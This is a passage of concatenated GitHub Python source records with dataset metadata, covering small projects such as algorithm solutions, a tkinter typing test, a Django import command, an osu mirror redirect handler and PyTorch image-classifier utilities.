Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"RenatoPeG/CF_Server","sub_path":"cholofighter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} {"seq_id":"7814827767","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\ndr = [-1, 1, 0, 0]\ndc = [0, 0, -1, 1]\n\n\ndef gravity(arr):\n for c in range(W):\n s = []\n for r in range(H):\n if arr[r][c]:\n s.append(arr[r][c])\n arr[r][c] = 0\n h = H-1\n while s:\n arr[h][c] = s.pop()\n h -= 1\n\n\ndef shot(row, col, arr1):\n stack = [(row, col)]\n while stack:\n r, c = stack.pop()\n if arr1[r][c] > 1:\n for i in range(4):\n nr, nc = r + dr[i], c + dc[i]\n for j in range(arr1[r][c] - 1):\n if 0 <= nr < H and 0 <= nc < W:\n if arr1[nr][nc] > 1:\n stack.append((nr, nc))\n else:\n arr1[nr][nc] = 0\n nr, nc = nr + dr[i], nc + dc[i]\n else:\n break\n arr1[r][c] = 0\n gravity(arr1)\n\ndef remains(arr):\n cnt = 0\n for c in range(W):\n for r in range(H-1, -1, -1):\n if not arr[r][c]:\n break\n cnt += 1\n return cnt\n\ndef dfs(idx, arr):\n global bricks\n if not bricks:\n return\n if idx == N:\n res = remains(arr)\n if res < bricks:\n bricks = res\n return\n\n for w in range(W):\n arr1 = [list(arr[_]) for _ in range(H)]\n for h in range(H):\n if arr1[h][w]:\n shot(h, w, arr1)\n if not remains(arr1):\n bricks = 0\n return\n dfs(idx+1, arr1)\n break\n\nfor tc in range(1, T+1):\n N, W, H = map(int, input().split())\n matrix = [list(map(int, input().split())) for i in range(H)]\n bricks = 987654321\n dfs(0, matrix)\n print('#{} {}'.format(tc, bricks))\n\n","repo_name":"asooso1/ssafy_algorithm","sub_path":"1012/박근석/5656_벽돌_깨기/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"34536305847","text":"# Sort it first on the basis of age then on the basis of salary.\nimport pandas as pd\n\na = [{'name': 'a', 'salary': 20000, 'age': 25},\n {'name': 'b', 'salary': 25000, 'age': 23},\n {'name': 'c', 'salary': 34000, 'age': 25},\n {'name': 'd', 'salary': 13000, 'age': 30}]\n\ndf1 = pd.DataFrame(a)\nprint(df1.sort_values(by=['age', 'salary']))","repo_name":"PiyushBadule/Python_Codes","sub_path":"Sort_on_basis_of_objects.py","file_name":"Sort_on_basis_of_objects.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"15201476304","text":"from time import time\nfrom random import choice as ch\nimport tkinter as tk\n\nclass App:\n def __init__(self):\n with open('../text.txt', 'r', encoding='UTF-8') as f:\n self.text = ch(f.readlines())\n for chars in [['ё', 'е'], ['Ё', 'е'], ['«', '\"'], ['»', '\"']]:\n self.text = self.text.replace(chars[0], chars[1])\n\n self.startTime = self.endTime = self.start = self.wrong = self.characters = self.words = self.cpm = self.wpm = self.accuracy = self.cpmWpm = 0\n\n\n self.root = tk.Tk()\n root = self.root\n\n self.main_frm = tk.Frame(root, bg='#0d0124', width=550, height=350)\n main_frm = self.main_frm\n self.frm = tk.Frame(root, bg='#0b1f07', width=550, height=350)\n frm = self.frm\n\n self.lbl = tk.Label(main_frm, text='Start typing the text to begin', font=('Comic', 20), fg='green',\n bg='#0d0124')\n self.ent = tk.Entry(main_frm, textvariable=True, font=('Arial', 20), width=25, state='normal', fg='purple',\n bg='#0d0124')\n self.ent.insert(0, 
self.text)\n self.btn = tk.Button(main_frm, command=self.cpm_wpm, text='Finish', font=('Times New Roman', 15), fg='green',\n bg='#0d0124')\n self.lbl_end = tk.Label(frm,\n text=f'Your result: \\ncpm: {self.cpm}\\nwpm: {self.wpm}\\naccuracy: {self.accuracy}%',\n font=('Sans', 30), fg='purple', bg='#0b1f07', width=22)\n self.again = tk.Button(frm, command=self.Again, text='Again', font=('Times New Roman', 15), fg='yellow',\n bg='#0b1f07', width=7)\n self.quit = tk.Button(frm, command=self.Quit, text='Quit', font=('Times New Roman', 15), fg='red',\n bg='#0b1f07', width=7)\n\n\n def Window(self):\n root = self.root\n root['bg'] = 'black'\n root.title('cpm_wpm')\n #root.geometry('550x350')\n #root.resizable(width=False, height=False)\n root.bind('<Key>', self.keyboard)\n\n root.mainloop()\n\n def Main_Frame(self):\n self.lbl.pack(padx=10, pady=50)\n self.ent.pack(padx=10, pady=10)\n self.btn.pack(pady=50)\n self.main_frm.grid()\n\n def Frame(self):\n frm = self.frm\n self.lbl_end.pack(pady=10)\n self.again.pack(pady=10)\n self.quit.pack(pady=10)\n frm.grid()\n\n def Text(self):\n with open('../text.txt', 'r', encoding='UTF-8') as f:\n self.text = ch(f.readlines())\n for chars in [['ё', 'е'], ['Ё', 'е'], ['«', '\"'], ['»', '\"']]:\n self.text = self.text.replace(chars[0], chars[1])\n self.ent.delete(0, 'end')\n self.ent.insert(0, self.text)\n\n def Again(self):\n self.startTime = self.endTime = self.start = self.wrong = self.characters = self.words = self.cpm = self.wpm = self.accuracy = self.cpmWpm = 0\n\n self.frm.grid_forget()\n self.main_frm.grid()\n\n self.Text()\n\n self.cpmWpm = 0\n\n def Quit(self):\n self.root.quit()\n\n def cpm_wpm(self):\n self.endTime = round(time())\n endTime = self.endTime\n startTime = self.startTime\n\n root = self.root\n\n\n inputTime = (endTime - startTime)\n\n characters = self.characters\n words = self.words\n wrong = self.wrong\n\n\n minLen = min(characters, len(self.text))\n try:\n cpm = round(characters / inputTime * 60)\n wpm = round(words / inputTime * 60)\n accuracy = 100 - round(wrong / minLen * 100)\n except ZeroDivisionError:\n cpm = 0\n wpm = 0\n accuracy = 0\n\n\n self.main_frm.grid_forget()\n self.cpm, self.wpm, self.accuracy = cpm, wpm, accuracy\n self.lbl_end.configure(text=f'Your result: \\ncpm: {self.cpm}\\nwpm: {self.wpm}\\naccuracy: {self.accuracy}%')\n self.Frame()\n\n self.cpmWpm = 1\n\n def keyboard(self, event):\n root = self.root\n if event.keysym == 'Escape':\n root.quit()\n elif event.keysym == 'Return':\n if self.cpmWpm == 0:\n self.cpmWpm = 1\n self.cpm_wpm()\n else:\n self.Again()\n try:\n if len(self.ent.get()) == 0:\n self.cpm_wpm()\n except Exception:\n pass\n else:\n if event.char == self.ent.get()[0]:\n if self.start == 0:\n self.startTime = round(time())\n self.start = 1\n self.characters += 1\n if event.char == ' ':\n self.words += 1\n self.ent.delete(0, 1)\n else:\n if self.start == 1:\n self.wrong += 1\n\n def main(self):\n self.Main_Frame()\n self.Window()\n\n\nif __name__ == '__main__':\n App().main()\n","repo_name":"Kuso0taku/cpm_wpm","sub_path":"GUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"20231254447","text":"import string\nimport re\n# Part 1\nwith open('day3-input.txt', 'r') as f:\n rucksacks = f.readlines()\n\nvalue_string = '{}{}'.format(string.ascii_lowercase, string.ascii_uppercase)\n\nsum = 0\nfor r in [r.strip() for r in rucksacks]:\n compartment1 = r[0:int((len(r)+1)/2)]\n 
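# the two halves share exactly one item type; its index in value_string gives the priority\n 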
compartment2 = r[int((len(r)+1)/2):]\n share = list(set(compartment1).intersection(compartment2))\n sum += value_string.index(share[0]) + 1 # index starts at 0\nprint(sum)\n\n# Part 2\nsum = 0\nwith open('day3-input.txt', 'r') as f:\n rucksacks = [r.strip() for r in f.readlines()]\n for i in range(0, len(rucksacks), 3):\n sacks = rucksacks[i:i+3]\n share = list(set(sacks[0]).intersection(sacks[1]).intersection(sacks[2]))\n #print(share)\n sum += value_string.index(share[0]) + 1 # index starts at 0\nprint(sum)","repo_name":"knastase/AoC2022","sub_path":"day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"5287271416","text":"import networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\nG=nx.read_adjlist(\"graphe1.txt\", create_using=nx.DiGraph())\r\n\r\ndef AffichageGraphe(graphe):\r\n pos = nx.planar_layout(graphe)\r\n\r\n nx.draw_networkx_nodes(graphe, pos)\r\n nx.draw_networkx_edges(graphe, pos)\r\n nx.draw_networkx_labels(graphe, pos)\r\n\r\n\r\n print(f\"This graph contains {graphe.number_of_nodes()} nodes and {graphe.number_of_edges()} edges.\")\r\n plt.show()\r\n\r\ndef arcs_arrivant(graphe):\r\n liste_arrivant = []\r\n\r\n for s in graphe.edges:\r\n if s[1] == \"2\":\r\n liste_arrivant.append(s)\r\n return liste_arrivant\r\n\r\ndef arcs_arrivantV2(graphe):\r\n liste_arrivant = []\r\n\r\n for s in graphe.predecessors(\"2\"):\r\n arc = (s, \"2\")\r\n liste_arrivant.append(arc)\r\n return liste_arrivant\r\n\r\nprint(list(G.successors(\"2\")))\r\nprint(arcs_arrivantV2(G))\r\nAffichageGraphe(G)\r\n","repo_name":"AlexandroAR/SAE3.02","sub_path":"TP/lecture_adj.py","file_name":"lecture_adj.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} {"seq_id":"5863517980","text":"from twisted.internet import defer\nfrom player import Player\n\nclass Server:\n\t\"\"\" this represents a bf3 server \"\"\"\n\n\tdef __init__(self, rcon):\n\t\tself.teams = {}\n\t\tself.players = {}\n\t\tself.rcon = rcon\n\t\n\tdef addPlayer(self, name, guid):\n\t\tlname = name.lower()\n\t\tif lname in self.players:\n\t\t\treturn self.players[lname]\n\t\tph = Player(name, guid)\n\t\tself.players[ph.lname] = ph\n\t\treturn ph\n\t\n\tdef delPlayer(self, name):\n\t\tlname = name.lower()\n\t\tif lname in self.players:\n\t\t\tph = self.players[lname]\n\t\t\tph.finalize()\n\t\t\tdel self.players[lname]\n\t\t\tdel ph\n\t\n\t@defer.inlineCallbacks\n\tdef getPlayer(self, name):\n\t\tlname = name.lower()\n\t\tif lname in self.players:\n\t\t\tdefer.returnValue(self.players[lname])\n\t\t\treturn\n\t\t### player not found, so let's create him\n\t\tpl = yield self.rcon.admin_listOnePlayer(name)\n\t\tph = self.addPlayer(pl['name'], pl['guid'])\n\t\tdefer.returnValue(ph)\n\t\treturn\n\t\n\n","repo_name":"ragzilla/txfbrcon","sub_path":"serverstate/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} {"seq_id":"26961951943","text":"# -*- coding: utf-8 -*-\nfrom conf import *\nfrom tool.utils import OSUtils\n\nos_utils = OSUtils()\n\n\ndef sync_common_data_files():\n if not os_utils.directory_exists(COMMON_DIR):\n raise ValueError(\"common directory does not exist!\")\n if not os_utils.directory_exists(SERVER_DIR):\n raise ValueError(\"server directory does not exist!\")\n if not 
os_utils.directory_exists(CLIENT_DATA_DIR):\n raise ValueError(\"client data directory does not exist!\")\n for root_dir, _, file_names in os_utils.walk(COMMON_DIR):\n for filename in file_names:\n source = os_utils.joinpath(root_dir, filename)\n server_dist = os_utils.joinpath(SERVER_DIR, filename)\n client_dist = os_utils.joinpath(CLIENT_DATA_DIR, filename)\n os_utils.copy(source, server_dist)\n os_utils.copy(source, client_dist)\n print(\"copied file %s to server/client.\" % filename)\n\n\ndef package_client():\n if not os_utils.directory_exists(CLIENT_DIR):\n raise ValueError(\"client directory does not exist!\")\n with os_utils.open_zip(UPDATE_FILE, \"w\",\n os_utils.ZIP_DEFLATED) as zipped:\n prefix_len = len(CLIENT_DIR) + 1\n for root, _, file_names in os_utils.walk(CLIENT_DIR):\n for filename in file_names:\n full_path = os_utils.joinpath(root, filename)\n zip_path = full_path[prefix_len:]\n zipped.write(full_path, zip_path)\n print(\"packaged client into data.7z\")\n\n\nif __name__ == '__main__':\n sync_common_data_files()\n package_client()\n","repo_name":"dwdw520533/mhzx","sub_path":"tool/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} {"seq_id":"6511840186","text":"import os\n\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom elections.constants import (\n PEOPLE_FOR_BALLOT_KEY_FMT,\n POLLING_STATIONS_KEY_FMT,\n POSTCODE_TO_BALLOT_KEY_FMT,\n)\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\n \"--full\",\n action=\"store_true\",\n dest=\"full\",\n default=False,\n help=\"Import all data, not just people\",\n )\n\n def handle(self, **options):\n if options[\"full\"]:\n commands = [\n (\"import_parties\",),\n (\"import_ballots\",),\n (\"import_people\",),\n ]\n else:\n commands = [(\"import_people\", \"--recently-updated\")]\n\n for command in commands:\n print(\" \".join(command))\n call_command(*command)\n\n # Delete the cache on a full import\n if options[\"full\"] and hasattr(cache, \"delete_pattern\"):\n for fmt in (\n POLLING_STATIONS_KEY_FMT,\n POSTCODE_TO_BALLOT_KEY_FMT,\n PEOPLE_FOR_BALLOT_KEY_FMT,\n ):\n cache.delete_pattern(fmt.format(\"*\"))\n\n # Unset dirty file if it exists\n if getattr(settings, \"CHECK_HOST_DIRTY\", False):\n dirty_file_path = os.path.expanduser(\n getattr(settings, \"DIRTY_FILE_PATH\")\n )\n\n if os.path.exists(dirty_file_path):\n os.remove(dirty_file_path)\n","repo_name":"DemocracyClub/WhoCanIVoteFor","sub_path":"wcivf/apps/core/management/commands/init_data.py","file_name":"init_data.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} {"seq_id":"1199504526","text":"import random\n\nimport requests\nimport json\n\nimport tornado.gen\nimport tornado.web\n\nfrom common.web import requestsManager\nfrom common.sentry import sentry\nfrom objects import glob\n\nMODULE_NAME = \"direct_download\"\nclass handler(requestsManager.asyncRequestHandler):\n\t\"\"\"\n\tHandler for /d/\n\t\"\"\"\n\t@tornado.web.asynchronous\n\t@tornado.gen.engine\n\t@sentry.captureTornado\n\tdef asyncGet(self, bid):\n\t\ttry:\n\t\t\tnoVideo = bid.endswith(\"n\")\n\t\t\tif noVideo:\n\t\t\t\tbid = bid[:-1]\n\t\t\tbid = int(bid)\n\t\t\trequestIP = requestsManager.getRequestIP(self)\n\t\t\tipa = 
requests.get(\"http://ip-api.com/json/{}?fields=continent,country\".format(requestIP)).text\n\t\t\tjsonOut = json.loads(ipa)\n\t\t\t\"\"\"\n\t\t\tif jsonOut[\"continent\"] == \"North America\" or jsonOut[\"continent\"] == \"South America\":\n\t\t\t\tmirror = \"https://aoba-proxy-us.herokuapp.com\"\n\t\t\t\ttry:\n\t\t\t\t\tc_mirror = \"https://aoba-proxy-us.herokuapp.com\"\n\t\t\t\t\trequests.get(c_mirror)\n\t\t\t\t\tprint(\"US SERVER OK\")\n\t\t\t\t\tresponse = requests.get(c_mirror+\"/d/1\")\n\t\t\t\t\tif response.status_code == 200:\n\t\t\t\t\t\tprint(\"US DOWNLOAD WORKS\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"US SERVER IS DYING INSIDE, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\t\texcept requests.exceptions.ConnectionError:\n\t\t\t\t\tprint(\"US SERVER DOWN, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\telif jsonOut[\"continent\"] == \"Europe\" or jsonOut[\"continent\"] == \"Africa\":\n\t\t\t\teu_mirror = ['https://storage.ainu.pw', 'https://aoba-proxy-eu.herokuapp.com']\n\t\t\t\ttry:\n\t\t\t\t\tc_mirror = \"https://aoba-proxy-eu.herokuapp.com\"\n\t\t\t\t\trequests.get(c_mirror)\n\t\t\t\t\tprint(\"EU SERVER OK\")\n\t\t\t\t\tresponse = requests.get(c_mirror+\"/d/1\")\n\t\t\t\t\tif response.status_code == 200:\n\t\t\t\t\t\tprint(\"EU DOWNLOAD WORKS\")\n\t\t\t\t\t\teu_mirror = ['https://storage.ainu.pw', 'https://aoba-proxy-eu.herokuapp.com']\n\t\t\t\t\t\tmirror = random.choice(eu_mirror)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"EU SERVER IS DYING INSIDE, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\t\texcept requests.exceptions.ConnectionError:\n\t\t\t\t\tprint(\"EU SERVER DOWN, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\telif jsonOut[\"continent\"] == \"Australia\":\n\t\t\t\tmirror = \"https://bm.realm.so\"\n\t\t\t\ttry:\n\t\t\t\t\tc_mirror = \"https://bm.realm.so\"\n\t\t\t\t\trequests.get(c_mirror)\n\t\t\t\t\tprint(\"AU SERVER OK\")\n\t\t\t\t\tresponse = requests.get(c_mirror+\"/d/1\")\n\t\t\t\t\tif response.status_code == 200:\n\t\t\t\t\t\tprint(\"AU DOWNLOAD WORKS\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"AU SERVER IS DYING INSIDE, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\t\texcept requests.exceptions.ConnectionError:\n\t\t\t\t\tprint(\"AU SERVER DOWN, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\t# Server is too slow, so I disabled it.\n#\t\t\telif jsonOut[\"continent\"] == \"Asia\":\n#\t\t\t\tmirror = \"https://bm-th.ainu.pw\"\n#\t\t\t\ttry:\n#\t\t\t\t\tc_mirror = \"https://bm-th.ainu.pw\"\n#\t\t\t\t\trequests.get(c_mirror)\n#\t\t\t\t\tprint(\"TH/SEA SERVER OK\")\n#\t\t\t\t\tresponse = requests.get(c_mirror+\"/d/1\")\n#\t\t\t\t\tif response.status_code == 200:\n#\t\t\t\t\t\tprint(\"TH/SEA DOWNLOAD WORKS\")\n#\t\t\t\t\telse:\n#\t\t\t\t\t\tprint(\"TH/SEA SERVER IS DYING INSIDE, REDIRECTING TO MAIN SERVER\")\n#\t\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n#\t\t\t\texcept requests.exceptions.ConnectionError:\n#\t\t\t\t\tprint(\"TH/SEA SERVER DOWN, REDIRECTING TO MAIN SERVER\")\n#\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\telse:\n\t\t\t\"\"\"\n\t\t\tmirror = \"https://storage.rina.place\"\n\n\t\t\tself.set_status(302, \"Moved Temporarily\")\n\t\t\tself.add_header(\"Location\", \"{}/d/{}{}\".format(mirror, bid, \"n\" if noVideo else \"\"))\n\t\t\tself.add_header(\"Cache-Control\", \"no-cache\")\n\t\t\tself.add_header(\"Pragma\", 
\"no-cache\")\n\t\texcept ValueError:\n\t\t\tself.set_status(400)\n\t\t\tself.write(\"Invalid set id\")","repo_name":"Unny984/eee","sub_path":"downloadMapHandler.py","file_name":"downloadMapHandler.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"3066934663","text":"import os\nimport json\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torchvision import datasets, transforms, models\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\nimport argparse\nimport logging\nfrom collections import OrderedDict\n\n\nclass Predict:\n def __init__(self, image_path):\n self.image_path = image_path\n \n\n def load_checkpoint(self, checkpoint):\n checkpoint = torch.load(checkpoint)\n self.model = models.vgg16(pretrained=True)\n for param in self.model.parameters(): \n param.requires_grad = False\n \n classifier = nn.Sequential(OrderedDict([\n ('fc1', nn.Linear (25088, 4096)),\n ('relu1', nn.ReLU ()),\n ('dropout1', nn.Dropout (0.05)),\n ('fc2', nn.Linear (4096, 2048)),\n ('relu2', nn.ReLU ()),\n ('dropout', nn.Dropout (0.05)),\n ('fc3', nn.Linear (2048, 102)),\n ('output', nn.LogSoftmax (dim =1))\n ]))\n \n self.model.classifier = classifier\n self.model.load_state_dict(checkpoint['state_dict'])\n self.model.class_to_idx = checkpoint['class_to_idx']\n \n def process_image(self):\n img = Image.open(self.image_path)\n\n original_width, original_height = img.size\n\n if original_width < original_height:\n size = [256, int(256 * original_height / original_width)]\n else: \n size = [int(256 * original_width / original_height), 256]\n \n img.thumbnail(size)\n width, height = img.size\n center = width / 2, height / 2\n left, top, right, bottom = center[0]-(224/2), center[1]-(224/2), center[0]+(224/2), center[1]+(224/2)\n img = img.crop((left, top, right, bottom))\n\n numpy_img = np.array(img)/255 \n\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n numpy_img = (numpy_img-mean)/std\n\n numpy_img = numpy_img.transpose(2, 0, 1)\n \n return numpy_img\n \n def imshow(self, ax=None, title=None):\n if ax is None:\n fig, ax = plt.subplots()\n\n image = self.process_image().transpose((1, 2, 0))\n \n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n image = std * image + mean\n image = np.clip(image, 0, 1)\n ax.imshow(image)\n \n return ax\n \n def predict(self, top_k, device, category_names=None):\n self.model.to(device)\n self.model.eval()\n torch_image = torch.from_numpy(np.expand_dims(self.process_image(), \n axis=0)).type(torch.FloatTensor).to(device)\n\n log_probs = self.model.forward(torch_image)\n linear_probs = torch.exp(log_probs)\n top_probs, top_labels = linear_probs.topk(top_k)\n \n top_probs = np.array(top_probs.detach())[0] \n top_labels = np.array(top_labels.detach())[0]\n \n idx_to_class = {val: key for key, val in self.model.class_to_idx.items()}\n top_labels = [idx_to_class[lab] for lab in top_labels]\n \n class_name = None\n if category_names:\n with open(category_names, 'r') as f:\n cat_to_name = json.load(f)\n class_name = [cat_to_name[i] for i in top_labels]\n \n \n return top_probs, top_labels, class_name\n \n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Predict based on the model')\n parser.add_argument('image_path', type=str, help='provide an image path')\n parser.add_argument('checkpoint', type=str, help='models checkpoint')\n parser.add_argument('--top_k', type=int, default=5, help=\"return top k most likely classes\")\n 
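# --category_names should point to a JSON file mapping class labels to real names (loaded with json.load in predict)\n 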
parser.add_argument('--category_names', type=str, help='a mapping of categories to real names from a json file')\n    parser.add_argument('--gpu', action='store_true', help = 'enable the GPU')\n\n    args = parser.parse_args()\n    image_path = args.image_path\n    checkpoint = args.checkpoint\n    top_k = args.top_k\n    category_names = args.category_names\n    \n    cuda = False\n    if args.gpu:\n        if torch.cuda.is_available():\n            cuda = True\n        else:\n            logging.warning(\"GPU is not available, using CPU instead\") \n    device = \"cuda\" if cuda else \"cpu\" \n    \n    predict = Predict(image_path)\n    predict.load_checkpoint(checkpoint)\n    numpy_img = predict.process_image()\n    top_probs, top_labels, class_name = predict.predict(top_k, device, category_names)\n    print(\"=\"*80)\n    print(\" \"*35 + 'FLOWER PREDICTOR')\n    print(\"=\"*80)\n    print(\"Input label (or labels) = {}\".format(top_labels))\n    print(\"Probability confidence(s) = {}\".format(top_probs))\n    print(\"Class(es) name(s) = {}\".format(class_name))\n    print(\"=\"*80)\n    \n    \n    ","repo_name":"skyicechuchu/AI_Programming_with_python","sub_path":"project2/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"18306906451","text":"import unittest\n\nfrom catlizor import Catlizor, Hook\n\n\nclass TaskManager:\n    def __init__(self):\n        self.tasks = {}\n\n    def add_task(self, task: str, *items):\n        self.tasks[task] = items\n\n    def pop_task(self):\n        return self.tasks.popitem()\n\n    def get_tasks(self, task: str):\n        return self.tasks[task]\n\n\n@Hook.pre\nclass PreHook(Hook):\n    methods = [\"add_task\"]\n    callbacks = []\n\n\n@Hook.on_call\nclass OnCallHook(Hook):\n    methods = [\"get_tasks\"]\n    callbacks = []\n\n\n@Hook.post\nclass PostHook(Hook):\n    methods = [\"pop_task\"]\n    callbacks = []\n\n\nclass TestCatlizor(unittest.TestCase):\n    def test_catlizor(self):\n        results = []\n\n        def callback(result):\n            nonlocal results\n            if result.result is not None:\n                results.append(result.result)\n            else:\n                results.append(result.args)\n\n        PreHook.callbacks = [callback]\n        OnCallHook.callbacks = [callback]\n        PostHook.callbacks = [callback]\n\n        PreHook.update_hookspec()\n        OnCallHook.update_hookspec()\n        PostHook.update_hookspec()\n\n        tm_catlizor = Catlizor.hook(TaskManager, PreHook, OnCallHook, PostHook)\n        tm = TaskManager()\n        tm.add_task(\"a\", 1, 2)\n        tm.get_tasks(\"a\")\n        tm.pop_task()\n\n        self.assertEqual(results, [(tm, \"a\", 1, 2), (1, 2), {}])\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"isidentical-archive/catlizor","sub_path":"tests/test_catlizor.py","file_name":"test_catlizor.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"48"}
{"seq_id":"551784658","text":"import pickle\nimport torch\n\n\nclass BaseActvMap:\n    '''\n    Base class that reads activation maps (if saved), calculates them (if not saved), \n    and flattens the activation maps with different methods.\n    Inherited by the CulpritNeuronScore and Uncertainty classes.\n    Function:\n        1. load saved pkl data\n        2. 
flatten actv map\n    '''\n    \n    def __init__(self):\n        pass \n    \n    \n    def load_pkl(self, path):\n        '''\n        load pkl files in the folder with the filename: gt, pred, activationMap, map_shape\n        '''\n        with open(path + 'activationMap.pkl', 'rb') as f:\n            actv_map = pickle.load(f)\n        with open(path + 'gt.pkl', 'rb') as f:\n            gt = pickle.load(f)\n        with open(path + 'pred.pkl', 'rb') as f:\n            pred_prob = pickle.load(f)\n        with open(path + 'map_shape.pkl', 'rb') as f:\n            map_shape = pickle.load(f)\n        # sanity check for data shape\n        assert gt.shape[0] == pred_prob.shape[0], 'pred and gt do not have the same datapoints, pred {}, gt {}'.format(pred_prob.shape, gt.shape)\n        for i in range(len(map_shape)):\n            assert actv_map[i].size()[1:] == map_shape[i][1:], 'activation map {} and map shape do not match, activation map {}, map_shape {}.'.format(i, actv_map[i].size(), map_shape[i])\n        print('*** actv shape (ignore dim 0 - batch size) is: {} .'.format(map_shape))\n        print('*** {} data loaded ***'.format(path))\n        return actv_map, gt.numpy(), pred_prob.numpy(), map_shape\n\n    \n    def flatten_actv_map(self, actv_map, mode):\n        '''\n        Input:\n            - actv_map, a dict of {layer idx: activation map for that layer of shape (datapoints, activations) - FC layer, or (datapoints, 3D activation maps) - conv}\n        Output: \n            - feature, turnout, of shape (datapoints, neurons). numpy object\n        Method:\n        1. flatten the 2D HxW activation map of one channel/unit/neuron to a scalar. \n            mode: mean, max, median, lognormal\n        2. aggregate the neurons/channels at each layer into a single activation vector.\n        \n        '''\n        # flatten activation map.\n        mode_dict = {'mean': torch.mean, 'max': torch.max, 'median':torch.median, 'lognormal': 'lognormal'}\n        activation = []\n        turnouts = [] # appending variable for layerwise turnout\n        # i corresponds to layer i in actv_map, of tensor d greater than 2. 
Disregards FC layers etc.\n        for i in range(len(actv_map)):\n            # conv layer case\n            if len(actv_map[i].size()) > 2:\n                actv_map_flattened = actv_map[i].reshape(actv_map[i].shape[0], actv_map[i].shape[1], -1)\n                if mode in ('max', 'median'):\n                    # torch.max/torch.median along a dim return (values, indices); keep only the values\n                    convert_map_to_scalar, _ = mode_dict[mode](actv_map_flattened, dim = 2)\n                    activation.append(convert_map_to_scalar)\n                    turnouts.append(torch.ones_like(convert_map_to_scalar)) # keep turnout aligned with feature\n                elif mode != 'lognormal':\n                    # take the mean across the channel volume\n                    convert_map_to_scalar = mode_dict[mode](actv_map_flattened, dim = 2)\n                    activation.append(convert_map_to_scalar)\n                    turnouts.append(torch.ones_like(convert_map_to_scalar)) # keep turnout aligned with feature\n                elif mode == 'lognormal':\n                    # extract non-zero activations, log transform, take mean, transform back to initial domain.\n                    n_val = list(actv_map_flattened.size())[0]\n                    n_kern = list(actv_map_flattened.size())[1]\n                    weighted_median = torch.zeros(n_val, n_kern)\n                    t_out = torch.zeros(n_val, n_kern) #iterable turnout variable\n                    for img in range(n_val):\n                        for kern in range(n_kern):\n                            activations = actv_map_flattened[img][kern] # fetch 1-d length HxW channelwise activations\n                            nonzero_idx = torch.nonzero(activations)\n                            t_out[img][kern] = len(nonzero_idx)/len(activations)\n                            if nonzero_idx.size()[0] == 0: # If nonzero index is empty, then do not pass an empty arg to torch.log()\n                                weighted_median[img][kern] = 0\n                            else:\n                                log_mean = torch.mean(torch.log(activations[nonzero_idx]))\n                                weighted_median[img][kern] = torch.exp(log_mean) \n                    # Append output after each layer \n                    activation.append(weighted_median) # 2d image x channel vector of weighted median activations\n                    turnouts.append(t_out)\n            else:\n                # FC layer case\n                activation.append(actv_map[i])\n                turnouts.append(torch.ones_like(actv_map[i]))\n        feature = torch.cat(activation, dim=1)\n        turnout = torch.cat(turnouts, dim=1)\n        if mode != 'lognormal': \n            print('*** feature shape is {}.'.format(feature.shape))\n        else:\n            print('*** non-zero image specific actv shape: {} | turnout: {} |'.format(feature.shape, turnout.shape))\n        # get the actv group for r/w predictions\n#         self.right_actv = self.feature[self.label, :]\n#         self.wrong_actv = self.feature[self.label==0, :]\n#         self.right_actv_weighted_median = self.feature_weighted_median[self.label, :]\n#         